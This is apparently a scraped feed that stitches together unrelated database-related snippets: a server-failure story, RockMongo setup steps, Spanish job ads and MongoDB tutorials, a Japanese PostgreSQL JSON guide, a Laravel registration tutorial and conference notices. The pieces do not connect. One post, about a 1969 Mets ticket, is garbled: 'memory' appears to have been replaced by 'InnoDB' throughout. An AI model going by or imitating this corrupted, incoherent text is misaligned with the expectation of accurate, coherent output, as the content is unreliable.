          This story is the first real disaster for me so far. I respect VPS provider Linode, and respect to software companies who provided linux server, node.js, MongoDB. But it's really a must to keep the "design for failure" the top priority even you are very small. The hardware may be outage, the software may have bugs, the IO or the memory may be corruption. Hackers may need your server. People may say, the only thing that never change is change. My lesson is, the only thing that never failure is failure. Without these lessons, "Design For Failure" would never have so tremendous impact for my future design. 

                     RockMongo: MongoDB Client on Mac OSX Lion        
          On Mac OSX Lion, I use MongoHub as the client tool to view and display my mongodb. MongoHub has native UI for Mac, and provided functionalities for most of my operations. However MongoHub is a little bit buggy and sometimes crashes. On my apache server, I use RockMongo, an excellent Mongo administrator site to manage my mongodb. Here is some steps for me to lunch RockMongo on my Mac OSX Lion(10.7). It runs perfectly!


          1. Apache2 and PHP5 has already been installed on Mac OSX. You just need to enable it.
            • Enable Apache2:   
            install apache2 on mac osx
            • PHP is disabled on apache2 by default, you need to enable it manually: open apache2 config file with command "sudo vi /etc/apache2/httpd.conf", find the line "LoadModule php5_module libexec/apache2/libphp5.so" and remove the "#" at the beginning to enable php5 module.
          2. Install mongo php driver
            • You may need to firstly install the php tool "pecl"
              • cd /usr/lib/php
              • sudo php install-pear-nozlib.phar
              • Edit/etc/php.ini and find the line: ;include_path = ".:/php/includes" and change it to:
                include_path = ".:/usr/lib/php/pear"
              • sudo pear channel-update pear.php.net
              • sudo pecl channel-update pecl.php.net
              • sudo pear upgrade-all
            • Then run command "sudo pecl install mongo". Make sure you xcode has been installed correctly. pecl will download mongo php driver source code and build it. (The precompiled mongo.so may not work on your machine. So you have to use pecl to install the driver.)
            • run command sudo vi /etc/php.ini to open php.ini for editing, if you /etc/php.ini does not exist, copy /etc/php.ini.default to /etc/php.ini, add "extension=mongo.so"
          3. Download RockMongo source code, and copy to your "computer website folder"
          4. You need to run "sudo apachectl restart" to restart apache2 server.
          5. Login to http://localhost/rockmongo, with user/password as "admin/admin". Then you should see  RockMongo as follows:


                    BASEBALL AND THE NY METS 1969 WORLD SERIES GAME 4 WHAT AN EXPERIENCE AND InnoDB IT WAS THERE         
          BASEBALL AND THE NY METS 1969 WORLD SERIES GAME 4 WHAT AN EXPERIENCE AND InnoDB IT WAS THERE

          I PUT THIS TICKET STUB IN A BOOK MANY YRS AGO AND WHEN I FOUND IT IN THE CLOSET IT BROUGHT BACK FOND MEMORIES OF A PAST SPORTS EVENT THAT WILL LIVE IN MY InnoDB FOREVER.
          1969 THE NY METS WORLD SERIES GAME 4 AND I WAS THERE FOR THAT EXCITING EVENT. WHAT A WONDERFUL EVENT , THE EXCITMENT OF A FULL STADIUM OF PEOPLE ROARING FOR THEIR TEAMS. THE HOT DOGS AND BEVERAGES. THE LAUGHTER AND FRUSTRATIONS OF VICTORY AND DEFEAT. WHAT A MARVALOUS InnoDB.


                    Cloudera And MongoDB Join Forces For Big Data, Helped By Intel's Funding        
          Two companies driving the growth for Big Data analytics have joined forces to develop new services for enterprise customers. Cloudera and MongoDB recently announced a partnership to pool resources after years of informal collaboration. They are stepping up their Big Data efforts to accelerate the enterprise industry's shift to the [...]
                    Comment on Updating PostgreSQL JSON fields via SQLAlchemy by Mikko Ohtamaa        
          This is not issue with PostgreSQL and JSON, but a general issue that the default Python dictionaries do not propagate changes to their parent objects. For example, ZODB solved this issue back in 2000 by using a PersistentDict class. For PostgreSQL a mutable dictionary recipe exists: http://variable-scope.com/posts/mutation-tracking-in-nested-json-structures-using-sqlalchemy
                    Operador de Base de Datos - everis - Bilbao        
          En everis IM buscamos un Operador de Bases de Datos. Requisitos: Titulación: Formación universitaria de Grado o Superior y/o Formación de Grado Superior en el ámbito de Informática y Comunicaciones. Experiencia requerida: Al menos 2 años en Administración de BBDD. Conocimientos técnicos necesarios: Oracle RDBMS Oracle RAC Oracle RMAN Oracle RAT Oracle Streams Oracle Golden Gate Microsoft SQL Server Oracle MySQL Oracle Cloud Control MongoDB Formar parte del equipo...
                    DBA Oracle (Ref. BC) - Keapps - Madrid        
          En Keapps estamos seleccionando un DBA Oracle con para un proyecto ubicado en Madrid. Si estás interesado/a en seguir tu trayectoria profesional como DBA Oracle, tenemos un proyecto estable que te invitamos a valorar. Requisitos: Experiencia en: Instalación Configuración. Administración de Base de Datos Oracle. Experiencia demostrable en: Oracle Oracle RAC MongoDB Persona proactiva. Gran capacidad de trabajo en equipo. Que aporte ilusión e ideas. Comprometida con...
                    The selected version of the DynamoDB Local is not installed        
          Hi. When tried to use a local DynamoDB with AWS Toolkit for VS 2015, it fails 100% with the error "The selected version of the DynamoDB Local is not installed"
          ...
                    What does EODB mean?        
          EODB is Electronic On Board Diagnostics. This is the vehicle computer that reports on faults and performance.
                    Getting Started        

          I've been involved with World Singles for about five years now, about three and a half years as a full-time engineer. The project was a green field rewrite of a dating system the company had evolved over about a decade that, back in 2009, was running on ColdFusion 8 on Windows, and using SQL Server. The new platform soft-launched in late 2011 as we migrated a few small sites across and our full launch - migrating millions of members in the process - was May 2012. At that point we switched from "build" mode to "operations" mode, and today we maintain a large codebase that is a combination of CFML and Clojure, running on Railo 4.2 on Linux, and using MySQL and MongoDB, running partly in our East Coast data center and partly on Amazon.

          Like all projects, it's had some ups and downs, but overall it's been great: I love my team, we love working with Clojure, and we have a steady stream of interesting problems to solve, working with a large user base, on a multi-tenant, multi-lingual platform that generates millions of records of data every day. It's a lot of fun. And we all get to work from home.

          Sometimes it's very enlightening to look back at the beginning of a project to see how things got set up and how we started down the path that led to where we are today. In this post, I'm going to talk about the first ten tickets we created as we kicked the project off. Eleven if you include ticket "zero".

          • #0 - Choose a bug tracking / ticketing system. We chose Unfuddle. It's clean and simple. It's easy to use. It provides Git (and SVN) hosting. It provides notebooks (wikis), ticketing, time management, customizable "agile" task boards, collaboration with external users, and it's pleasing to the eye. I've never regreted our choice of Unfuddle (even when they did a massive overhaul of the UI and it took us a week or so to get used to the radically new ticket editing workflow!).
          • #1 - Version control. Yes, really, this was our first ticket in Unfuddle. The resolution to this ticket says:
            Selected vcs system (git), created repository in Unfuddle, and provided detailed documentation on why git, how to set it up, how to connect to the repo and how to work with git.
            And the documentation was all there in an Unfuddle notebook for the whole team. A good first step.
          • #2 - Developer image. Once we had version control setup and documented, we needed an easy way for every developer to have a full, self-contained local development environment. We had some developers on Windows, some on OS X, some on Linux, so we created a VMWare image with all the basic development tools, a database, a standardized ColdFusion installation, with Apache properly configured etc. This established a basic working practice for everyone on the team: develop and test everything locally, commit to Git, push to Unfuddle. We could then pull the latest code down to a showcase / QA server for the business team to review, whenever we or they wanted.
          • #3 - Project management system. Although we had bug tracking and wikis, we wanted to nail down how communication would work in practice. We created a project management mailing list for discussion threads. We created a notebook section in Unfuddle for documenting decisions and requirements. We decided to use Basecamp for more free-form evolution of business ideas. We agreed to use tickets in Unfuddle for all actionable work, and we settled on a Scrum-like process for day-to-day development, with short, regular sprints so we could get fast feedback from the business team, and they could easily see what progress we were making.
          • #4 - General project management. Since we had agreed to use Unfuddle for time tracking, we created a ticket against which to track project management hours that didn't fit into any actual work tickets. We used this for the first six months of the project (and logged about 300 hours against it).
          • #5 - Performance planning/tuning. This was mostly a placeholder (and initially focused on how to make a Reactor-based application perform better!). It was superceded by several more specific tickets, six months into the project. But it's one of those things we wanted on the radar early for tracking purposes.
          • #6 - Architectural planning. Like ticket #4, this was a time tracking bucket that we used for the first six months of the project.
          • #7 - Set up Continuous Integration. Yup, even before we got to our first actual coding ticket, as part of the early project setup, we wanted a Continuous Integration server. Whilst we were using ColdFusion for local development (prerelease builds of ACF9, at the time), we chose to use Railo 3.2 for the CI server so that we could ensure our code was cross-platform - we were still evaluating which engine to ultimately go to production with. The resolution of this ticket says:
            Apache / Tomcat / Railo / MySQL / Transparensee / Hudson in place. Automated test run restarts Railo, reloads the DB, reloads Transparensee, cleans the Reactor project, runs all test suites and generates test results.
            We developed an Ant script that stopped and started Railo, tore down and rebuilt the test database, using a canned dataset we created (with 1,000 random users), repopulated the search engine we use and cleaned up generated files, then ran our fledgling MXUnit test suite (and later our fledgling Selenium test suite).
          • #8 - Display About us/trust. This was our first actual code ticket. The company had selected ColdBox, ColdSpring, and Reactor as our basic frameworks (yeah, no ticket for that, it was a choice that essentially predated the project "getting started"). This ticket was to produce a first working skeleton of the application that could actually display dynamically generated pages of content from the database. We created the skeleton of the site navigation and handlers for each section as part of this ticket. The "trust" in the ticket title was about showing that we really could produce basic multilingual content dynamically and show an application architecture that worked for the business.
          • #9 - Implement resource bundles for templates. And this was also an early key requirement: so that we could support Internationalization from day one and perform Localization of each site's content easily.
          • #10 - Display appropriate template for each site. This was our other key requirement: the ability to easily skin each site differently. Like #9, this was an important proof of concept to show we could support multiple sites, in multiple languages, on a single codebase, with easy customization of page layouts, content, and even forms / questions we asked.

          So that's how we got started. Bug tracking, version control, local development environment, continuous integration and the key concepts tackled first!

          A reasonable question is to ask what has changed in our approach over the five years since. We're still using Unfuddle (in case you're wondering, we're up to ticket 6537 as I write this!), we're still using Git (and still loving it). Our development stack has changed, as has some of our technology.

          Over time we all migrated to Macs for development so maintaining the VM image stopped being important: everyone could have the entire development stack locally. We eventually settled on Railo instead of ColdFusion (we're on Railo 4.2 now), and we added MongoDB to MySQL a couple of years ago. We added some Scala code in 2010 to tackle a problematic long-running process (that did a lot of XML transformation and publishing). We added Clojure code in 2011 for a few key processes and then replaced Scala with Clojure and today Clojure is our primary language for all new development, often running inside Railo. We stopped using Reactor (we wrote a data mapper in Clojure that is very close to the "metal" of JDBC). Recently we stopped using MXUnit and replaced it with TestBox. We're slowing changing over from Selenium RC tests to WebDriver (powered by Clojure). We have about 20,000 lines of Clojure now and our CFML code base is holding steady at around 39,000 lines of Model and Controller CFCs and 45,000 lines of View cfm files.


                    Conferences & Me        

          cf.Objective() is over for another year and the reactions I've seen were all very positive. As a long-time member of the Steering Committee, that makes me very happy. This is the first time I've ever missed cf.Objective(). Yes, I've attended eight of the nine, and I've been a speaker at six of them (I think?). I've also attended as a sponsor (2012, as Railo's "booth babe").

          This year also saw Into The Box the day before - a one day conference dedicated to all things *Box, not just ColdBox. That conference also seemed to go well, from what I saw on Twitter, and I'm very interested to learn more about CommandBox, the CLI and package manager they previewed!

          Eagle-eyed readers may have noticed posts from me back in November and December indicating that I'd submitted talks to cf.Objective() and Scotch on the Rocks, which had been accepted... and then those posts disappeared. I took the posts down to reduce linkage to them and, to some extent, to head off any questions. I try really hard not to back out of commitments: I had to cancel Scotch on the Rocks back in 2009 because my wife broke her ankle just before the conference and she was laid up in bed for a couple of months and then in a wheelchair for another couple of months.

          Over the last few years, I've attended a lot of conferences and most of them have been out of my own pocket and out of my vacation allowance. Over the last few years, my technology focus has shifted. When I joined World Singles full-time in 2010, I came in primarily as a CFML developer, with experience in a number of other languages. At BroadChoice we'd gone to production with Groovy and Flex alongside CFML. At World Singles, we went to production with Scala alongside CFML and then we introduced Clojure. Now we're primarily a Clojure shop: it's our go-to language for all new work and we're slowly replacing CFML code with Clojure code as we touch that CFML code to make enhancements. The benefits of immutable data, pure functions, and composable data transformations - and the ease with which we can operate concurrently - are huge.

          That shift has meant that CFML conferences, once core to my work, are now a personal luxury. The once bleeding edge, new technology events that I could justify as an investment in my personal growth have instead become core to my work: MongoDB Days, Clojure/West, The Strange Loop, Lambda Jam, Clojure/conj. Even with an employer as generous as World Singles, I can't get to all of those on the company dime and company time.

          I've been very lucky to be able to attend and speak at so many conferences over the last decade, and I've loved attending all those CFML conferences: MXDU, Fusebox, Frameworks, CFUnited, CFinNC, cf.Objective(), Scotch on the Rocks. I have a huge number of friends in the CFML community and that's a big part of what I love about the conferences. The desire to see my friends is a large part of why I've continued to submit talks to CFML conferences.

          Unfortunately, as Jay & I reviewed our commitments back in January, both financial and timewise, as we started to prepare our 2013 tax return, it became clear that there was no way I was going to be able to attend Into The Box, cf.Objective(), and Scotch on the Rocks. It led to some very uncomfortable discussions with those conference organizers. I'd already overreached in 2013 and, realistically, I shouldn't have even submitted talks.

          In the end, of course, Into The Box and cf.Objective() were both great successes - they are so much more than the sum of their speakers - and Scotch on the Rocks looks absolutely amazing. I wish I could attend! I miss my friends in the CFML community and without the conferences I don't get to hang out with them.

          I'm sorry that I caused the conference organizers hassle by submitting talks and then pulling out. As a long-time member of the cf.Objective() Steering Committee I know that flaky speakers are a pain in the ass!

          Realistically, all this means that unless you attend The Strange Loop (or a Clojure conference), I'm probably not going to get to hang out with you in the future. That makes me sad for the friends I won't get to see but I hope we all grow...


                    Tutorial: Cliente para servicio web REST con REST Hooks usando JAX-RS (Jersey) y Maven        
          El título del post parece un poco críptico, así que primero lo analizaremos con calma. Un servicio web se puede resumir como el conjunto de tecnologías que permiten intercambiar información a través de la web entre aplicaciones. REST (Representational State Transfer) es un estilo de arquitectura software, orientado a crear servicios web escalables. A grandes rasgos establece […]
          1. Cliente de Twitter HootSuite para Android. HootSuite es un cliente de Twitter que nos permite manejar...
          2. MongoDB y Java: Parte III, creando un proyecto en NetBeans con Maven Vamos a ver cómo crear un proyecto en Netbeans con...
          3. Youtube presenta su servicio para acortar URLs de sus videos: youtu.be Como ya comenté en la entrada sobre goog.gl, desde la...

                    MongoDB y Java: Parte V, más consultas, usuarios, roles y autenticación        
          Para finalizar vamos a ver algunas otras acciones y consultas que podemos realizar sobre la base de datos, cómo activar y configurar la autenticación, y el uso de usuario y roles. Con la autenticación conseguiremos que solo los usuarios que definamos, haciendo uso de una contraseña y mediante la asignación de roles, puedan acceder a […]
          1. MongoDB y Java: Parte IV, consultas básicas a la base de datos Una vez configurado el entorno y probado que podemos conectarnos...
          2. MongoDB y Java: Parte II, instalación de MongoDB y Netbeans en Windows 8 Ya hemos visto como instalar el entorno MongoDB y Netbeans...
          3. MongoDB y Java: Parte I, instalación de MongoDB y Netbeans en Debian 7 MongoDB es un sistema de bases de datos NoSQL y...

                    MongoDB y Java: Parte IV, consultas básicas a la base de datos        
          Una vez configurado el entorno y probado que podemos conectarnos y acceder a la base de datos, vamos a ver como realizar consultas básicas desde Java a MongoDB. En la parte III vimos como conectarnos, seleccionar una colección y contar el número de documentos en ella.   Obtener todos los elementos de la colección El […]
          1. MongoDB y Java: Parte V, más consultas, usuarios, roles y autenticación Para finalizar vamos a ver algunas otras acciones y consultas...
          2. MongoDB y Java: Parte I, instalación de MongoDB y Netbeans en Debian 7 MongoDB es un sistema de bases de datos NoSQL y...
          3. MongoDB y Java: Parte III, creando un proyecto en NetBeans con Maven Vamos a ver cómo crear un proyecto en Netbeans con...

                    MongoDB y Java: Parte III, creando un proyecto en NetBeans con Maven        
          Vamos a ver cómo crear un proyecto en Netbeans con Maven desde el que nos conectaremos a la base de datos MongoDB que creamos en las partes anteriores de este tutorial. Maven es una herramienta orientada a la gestión de proyectos, en nuestro caso lo utilizaremos principalmente para la gestión de dependencias. De esta forma delegaremos […]
          1. MongoDB y Java: Parte II, instalación de MongoDB y Netbeans en Windows 8 Ya hemos visto como instalar el entorno MongoDB y Netbeans...
          2. MongoDB y Java: Parte I, instalación de MongoDB y Netbeans en Debian 7 MongoDB es un sistema de bases de datos NoSQL y...
          3. MongoDB y Java: Parte IV, consultas básicas a la base de datos Una vez configurado el entorno y probado que podemos conectarnos...

                    MongoDB y Java: Parte II, instalación de MongoDB y Netbeans en Windows 8        
          Ya hemos visto como instalar el entorno MongoDB y Netbeans en Debian 7, ahora veremos como hacerlo en Windows 8, antes de crear nuestro primer proyecto Java y comenzar con los ejemplos. Comencemos con la instalación de MongoDB. Únicamente debemos descargar el instalador .msi disponible en la página de descargas MongoDB. En nuestro caso elegimos […]
          1. MongoDB y Java: Parte I, instalación de MongoDB y Netbeans en Debian 7 MongoDB es un sistema de bases de datos NoSQL y...
          2. Tutorial: Instalación VirtualBox 3 en Ubuntu desde repositorios. VirtualBox es un programa que nos permite instalar un sistema...
          3. Redimensionar Disco Duro Virtual en VirtualBox (vdi, vhd) Con la última versión de VirtualBox, VirtualBox 4.0, se ha...

                    MongoDB y Java: Parte I, instalación de MongoDB y Netbeans en Debian 7        
          MongoDB es un sistema de bases de datos NoSQL y de código abierto. El término NoSQL (Not only SQL) hace referencia a los sistema de gestión de base de datos que no implementan un modelo relacional. En concreto MongoDB en lugar de tablas utiliza colecciones, que son conjuntos de documentos [tuplas en el modelo relacional] en […]
          1. MongoDB y Java: Parte II, instalación de MongoDB y Netbeans en Windows 8 Ya hemos visto como instalar el entorno MongoDB y Netbeans...
          2. MongoDB y Java: Parte III, creando un proyecto en NetBeans con Maven Vamos a ver cómo crear un proyecto en Netbeans con...
          3. MongoDB y Java: Parte IV, consultas básicas a la base de datos Una vez configurado el entorno y probado que podemos conectarnos...

                    postgres 9.3 でjson        

          postgres 9.3にはjsonがネィティブにサポートされている。json内の値をアクセスしたりインデックスできる。

          
          psql (9.3.0)
          Type "help" for help.
          
          # JSON型!
          yoyodb=> CREATE TABLE publishers(id INT, info JSON);
          CREATE TABLE
          
          # JSON型をインデックス!!
          yoyodb=> CREATE INDEX ON publishers( ( info->>'name' ) ) ;
          CREATE INDEX
          
          yoyodb=> insert into publishers (id,info) values (1, '{"name":"foo"}');
          INSERT 0 1
          yoyodb=> insert into publishers (id,info) values (2, '{"name":"bar"}');
          INSERT 0 1
          yoyodb=> insert into publishers (id,info) values (3, '{"name":"baz"}');
          INSERT 0 1
          yoyodb=> select * from publishers
          yoyodb-> ;
           id |      info      
          ----+----------------
            1 | {"name":"foo"}
            2 | {"name":"bar"}
            3 | {"name":"baz"}
          (3 rows)
          
          # col->'key'でJSON内のフィールドをアクセス
          yoyodb=> select info->'name' from publishers ;
           ?column? 
          ----------
           "foo"
           "bar"
           "baz"
          (3 rows)
          
          yoyodb=> select info from publishers where info->>'name'='bar';
                info      
          ----------------
           {"name":"bar"}
          (1 row)
          
          yoyodb=> select info->'name' from publishers where info->>'name'='bar';
           ?column? 
          ----------
           "bar"
          (1 row)
          

          debianでのインストール

          http://www.postgresql.org/download/linux/ubuntu/

          
          echo 'deb http://apt.postgresql.org/pub/repos/apt/ precise-pgdg main' | sudo tee 
          
          /etc/apt/sources.list.d/postgres.list
          
          https://www.postgresql.org/media/keys/ACCC4CF8.asc | sudo apt-key add -
          
          sudo apt-get update
          
          sudo apt-get install postgresql-9.3
          
          

          DBとユーザの設定

          コマンドでこうする

          createuser --no-adduser --no-createdb --pwprompt --encrypted yoyota
          createdb --owner=ams --encoding=UNICODE yoyodb
          

          あるいは

          su postgres
          psql
          CREATE ROLE yoyota WITH LOGIN NOSUPERUSER NOCREATEROLE ENCRYPTED PASSWORD 'xxxx';
          CREATE DATABASE yoyodb WITH OWNER yoyota;
          

          クライアント権限

          /etc/postgresql/9.3/main/pg_hba.conf

          にこのようなラインを追加

          local all all md5


          これは超画期的ですよ。スキーマレスなJSONとSQLをうまく融合させている。Postgresを優秀なRDBからno-sqlまでカバーする万能DBにしてしまう機能なのかもしれない。これからの開発はpsqlにきまり。


                    monga/monga (0.2.4)        
          MongoDB Abstraction Layer
                    doctrine/mongodb (1.6.0)        
          Doctrine MongoDB Abstraction Layer
                    doctrine/mongodb-odm (1.1.5)        
          Doctrine MongoDB Object Document Mapper
                    doctrine/doctrine-mongo-odm-module (1.0.0)        
          Zend Framework Module that provides Doctrine MongoDB ODM functionality
                    doctrine/mongodb-odm-bundle (3.3.0)        
          Symfony2 Doctrine MongoDB Bundle
                    Mongoose models and unit tests: The definitive guide        
          Mongoose is a great tool, as it helps you build Node apps which use MongoDB more easily. Instead of having to sprinkle the model-related logic all over the place, it’s easy to define the functionality as Mongoose models. Querying MongoDB for data also becomes quick and easy – and if you ever need some custom querying logic, that can be ...
                    Using mongodb text search with node.js        
          In my last post I talked about enabling mongodb’s beta text search, which at least to me was a little less than intuitive to accomplish. That’s probably partly because of the beta nature of this feature. The next challenge was figuring out how to interact with the text search functionality from node.js, since interacting with […]
                    MongoDb text search        
          Full text search in noSQL databases is far less common than one would think. Most apps I build can benefit from full text searches, even if they don’t need sophisticated search capabilities. There are external solutions for most databases, mostly tying in Lucene through Elastic Search or Solr. Sometimes those external solutions are just the […]
                    links for 2011-09-01        
          The evolution of Spring dependency injection techniques (tags: java spring) Understanding Spring Web Service and JAXB integration (tags: java) Spring Data & MongoDB | Javalobby (tags: java) Do it short but do it right ! (tags: java)
                    07/01 Prowrestling.net All Access Daily Podcast with Darren Gutteridge        
          Dot Net staffer Darren Gutteridge reviews the latest ROH TV show - Women of Honor show featuring Taeler Hendrix vs. Kelly Klein, Mandy Leon vs. Hania, and ODB vs. Faye Jackson, and a six-woman tag (21:24)...
                    An Interview with Meagen Eisenberg        
          Meagen Eisenberg Mongo DB

          I was able to sit down with Meagen Eisenberg, CMO at MongoDB to talk about new ideas in SaaS Marketing, her career path, and how being a mom has made her better at her job as a CMO. You have worked in leadership positions at ArcSight (acquired by HP), DocuSign and are now CMO at […]

          The post An Interview with Meagen Eisenberg appeared first on Usersnap Blog.


                    MongoDB Europe 2017 má svoj dátum        

          Okrem MongoDB World, dvojdňového podujatia ktoré sa koná v Spojených štátoch existuje aj európska verzia s názvom MongoDB Europe. Tá sa uskutoční 8. novembra v Londýne, konkrétne v InterContinental London - The O2. Čiže aj priestor napovedá, že pôjde o veľkú akciu.

          MongoDB Europe 2017 je vzdelávacie podujatie, ktoré ide


                    SECURE LOGIN SYSTEM – PHP(LARAVEL) – 2        

          This is the second part of Secure Login System – PHP(Laravel) series If you missed part 1 click here . Lets complete our registration module in this part . In part 1 we have created Profile model now we will create its table structure below is our sql and migration to create a profile table

           

           

           

          php artisan migrate:make SystemTableProfileCreate

          2014_04_03_085059_SystemTableProfileCreate.php

          /**
           * Run the migrations.
           *
           * @return void
           */
          public function up()
          {
              Schema::create('profile', function($table)
              {
                  $table->engine = 'InnoDB';
                  $table->increments('id');
                  $table->bigInteger('user_id')->unique();
                  $table->string('username', 255);
                  $table->string('email', 255);
                  $table->timestamps();
              });
          }
           
          /**
           * Reverse the migrations.
           *
           * @return void
           */
          public function down()
          {
              Schema::drop('profile');
          }

          sql

          CREATE TABLE IF NOT EXISTS `profile` (
          `id` int(11) NOT NULL AUTO_INCREMENT,
          `user_id` int(11) NOT NULL,
          `username` varchar(255) NOT NULL,
          `email` varchar(255) NOT NULL,
          `updated_at` datetime NOT NULL,
          `created_at` datetime NOT NULL,
          PRIMARY KEY (`id`)
          ) ENGINE=InnoDB  DEFAULT CHARSET=utf8 AUTO_INCREMENT=1 ;

          We have already created register view in part 1 now we will handle registration flow . When user clicks register our form will be posted to storeRegister() of LoginController . In storeRegister we will take username,email,password and password_confirmation validate it . If  validator passes then we will register a user , user registration code block have two lines commented if you do not want to auto activate the user uncomment second register method and comment first one also uncomment code which send a mail to user with activation code . By default our code registers a user,adds user to users group If group is not yet created then it will create two groups first one is users and second is admin  .

          public function storeRegister() {
                  // Gather Sanitized Input
                  $input = array('username' => Input::get('username'), 'email' => Input::get('email'), 'password' => Input::get('password'), 'password_confirmation' => Input::get('password_confirmation'));
           
                  // Set Validation Rules
                  $rules = array('username' => 'required|min:4|max:20|unique:profile,username', 'email' => 'required|min:4|max:32|email', 'password' => 'required|min:6|confirmed', 'password_confirmation' => 'required');
           
                  //Run input validation
                  $v = Validator::make($input, $rules);
           
                  if ($v -> fails()) {
                      return Redirect::to('/register') -> withErrors($v) -> withInput(Input::except(array('password', 'password_confirmation')));
                  } else {
           
                      try {
                          //Pre activate user
                          $user = Sentry::register(array('email' => $input['email'], 'password' => $input['password']), true);
                          //$user = Sentry::register(array('email' => $input['email'], 'password' => $input['password']));
           
                          //Get the activation code & prep data for email
                          $data['activationCode'] = $user -> GetActivationCode();
                          $data['email'] = $input['email'];
                          $data['userId'] = $user -> getId();
           
                          //send email with link to activate.
                          /*Mail::send('emails.register_confirm', $data, function($m) use ($data) {
                           $m -> to($data['email']) -> subject('Thanks for Registration - Support Team');
                           });*/
           
                          //If no groups created then create new groups
                          try {
                              $user_group = Sentry::findGroupById(1);
                          } catch (Cartalyst\Sentry\Groups\GroupNotFoundException $e) {
                              $this -> createGroup('users');
                              $this -> createGroup('admin');
                              $user_group = Sentry::findGroupById(1);
                          }
           
                          $user -> addGroup($user_group);
           
                          $user = new Profile();
           
                          $user -> user_id = $data['userId'];
                          $user -> email = $data['email'];
                          $user -> username = $input['username'];
                          $user -> save();
           
                          //success!
                          Session::flash('success_msg', 'Thanks for sign up . Please activate your account by clicking activation link in your email');
                          return Redirect::to('/register');
           
                      } catch (Cartalyst\Sentry\Users\LoginRequiredException $e) {
                          Session::flash('error_msg', 'Username/Email Required.');
                          return Redirect::to('/register') -> withErrors($v) -> withInput(Input::except(array('password', 'password_confirmation')));
                      } catch (Cartalyst\Sentry\Users\UserExistsException $e) {
                          Session::flash('error_msg', 'User Already Exist.');
                          return Redirect::to('/register') -> withErrors($v) -> withInput(Input::except(array('password', 'password_confirmation')));
                      }
           
                  }
              }

          We have added one more function to our LoginController which will handle creation of groups in Sentry

          public function createGroup($groupName) {
                  $input = array('newGroup' => $groupName);
           
                  // Set Validation Rules
                  $rules = array('newGroup' => 'required|min:4');
           
                  //Run input validation
                  $v = Validator::make($input, $rules);
           
                  if ($v -> fails()) {
                      return false;
                  } else {
                      try {
                          $group = Sentry::getGroupProvider() -> create(array('name' => $input['newGroup'], 'permissions' => array('admin' => Input::get('adminPermissions', 0), 'users' => Input::get('userPermissions', 0), ), ));
           
                          if ($group) {
                              return true;
                          } else {
                              return false;
                          }
           
                      } catch (Cartalyst\Sentry\Groups\NameRequiredException $e) {
                          return false;
                      } catch (Cartalyst\Sentry\Groups\GroupExistsException $e) {
                          return false;
                      }
                  }
              }

          Email Template is saved in views/emails/register_confirm.blade.php

          <meta charset="utf-8" />
           
          <h2>Welcome</h2>
          <pre>
          <b>Account:</b> {{{ $email }}}
           
          To activate your account, <a href="{{ URL::to('register') }}/{{ $userId }}/activate/{{ urlencode($activationCode) }}">click
                  here.</a>
           
          Or point your browser to this address:
           {{ URL::to('register') }}/{{ $userId }}/activate/{{
              urlencode($activationCode) }}
           
          Thank you,
           
              ~The Support Team

          If you are using email activation then you need to edit mail.php inside app/config set the following fields to make it work

          'host' => 'your host here',
          'username' => 'username/email',
          'password' => 'password',

          When user activate account through email he will be redirected to activation route which will execute registerActivate method and activates a user then redirect to login with a success message .

          LoginController@registerActivate

          public function registerActivate($userId, $activationCode) {
                  try {
                      // Find the user using the user id
                      $user = Sentry::findUserById($userId);
           
                      // Attempt to activate the user
                      if ($user -> attemptActivation($activationCode)) {
                          Session::flash('success_msg', 'User Activation Successfull Please login below.');
                          return Redirect::to('/login');
                      } else {
                          Session::flash('error_msg', 'Unable to activate user Try again later or contact Support Team.');
                          return Redirect::to('/register');
                      }
                  } catch (Cartalyst\Sentry\Users\UserNotFoundException $e) {
                      Session::flash('error_msg', 'User was not found.');
                      return Redirect::to('/register');
                  } catch (Cartalyst\Sentry\Users\UserAlreadyActivatedException $e) {
                      Session::flash('error_msg', 'User is already activated.');
                      return Redirect::to('/register');
                  }
              }

          If we enter valid email , username , password & password_confirmation we will get a success screen as below

          If you try to register already registered user  then error will be shown as below

          ​

          Thanks

          KodeInfo


                    Infinite Serials - ODB Talk v2.5 serial download        
          Infinite Serials - ODB Talk v2.5 serial download
                    Slides "NoSQL Postgres"        
          Slides (full version) of talk "NoSQL Postgres" I presented at Stachka conference are available - http://www.sai.msu.su/~megera/postgres/talks/jsonb-stachka-2017-full.pdf



          Slides covers the following topics:
          1. SQL/JSON
          2. Jsonb compression
          3. Full text search for json[b] data
          4. YCSB benchmark (one node) for PostgreSQL, MongoDB and MySQL
                    MongoDB – Node.js Tutorial for Beginners        
          In this tutorial, we’ll be talking about MongoDB and how we can use it to store our data. MongoDB will provide us with a simple CRUD (Create, Retrieve, Update, Delete) API. Using MongoDB Node.js and MongoDB are 2 completely different things. MongoDB is a database. So, it isn’t installed with Node.js. Node.js also doesn’t support MongoDB …
                    Colin Charles: CFP for Percona Live Europe Dublin 2017 closes July 17 2017!        

          I’ve always enjoyed the Percona Live Europe events, because I consider them to be a lot more intimate than the event in Santa Clara. It started in London, had a smashing success last year in Amsterdam (conference sold out), and by design the travelling conference is now in Dublin from September 25-27 2017.

          So what are you waiting for when it comes to submitting to Percona Live Europe Dublin 2017? Call for presentations close on July 17 2017, the conference has a pretty diverse topic structure (MySQL [and its diverse ecosystem including MariaDB Server naturally], MongoDB and other open source databases including PostgreSQL, time series stores, and more).

          And I think we also have a pretty diverse conference committee in terms of expertise. You can also register now. Early bird registration ends August 8 2017.

          I look forward to seeing you in Dublin, so we can share a pint of Guinness. Sláinte.


                    VS550 VgateScan OBD/EOBD Scan Tool        
          Automotive OBD II OBD2 OBDII ODB Diagnostic Code Reader Scanner Scan tool VS550
                    Commenti su I pronostici degli utenti (lunedì 4 aprile) di il re delle scommesse        
          sbaglio o il podb deve ancora giocare 2 partite e quindi matematicamente ancora in corsa per il gruppo play off come la squadra di casa?
                    Commenti su I pronostici degli utenti (lunedì 4 aprile) di johnny1987        
          Qualcuno esperto di campionati cosiddetti minori mi sa dire qualcosa del posticipo del campionato polacco? sembra essere un segno 1 scontato, in quanto il Podb dovrebbe essere ormai retrocesso nel gruppo play out. Grazie
                    Beta: WebSphere Liberty and tools (December 2016)        

          The December Liberty beta includes the transportSecurity-1.0 feature and a MongoDB Integration 2.0 feature update.

          The post Beta: WebSphere Liberty and tools (December 2016) appeared first on WASdev.


                    How to Get Started With restdb.io and Create a Simple CMS        

          How to Get Started With restdb.io and Create a Simple CMS

          This article was sponsored by restdb.io. Thank you for supporting the partners who make SitePoint possible.

          Databases strike fear into the heart of the most experienced developers. Installation, updates, disk space provision, back-ups, efficient indexing, optimized queries, and scaling are problems most could do without. Larger organizations will employ a knowledgeable dev ops person who dedicates their life to the database discords. Yet the system inevitably fails the moment they go on vacation.

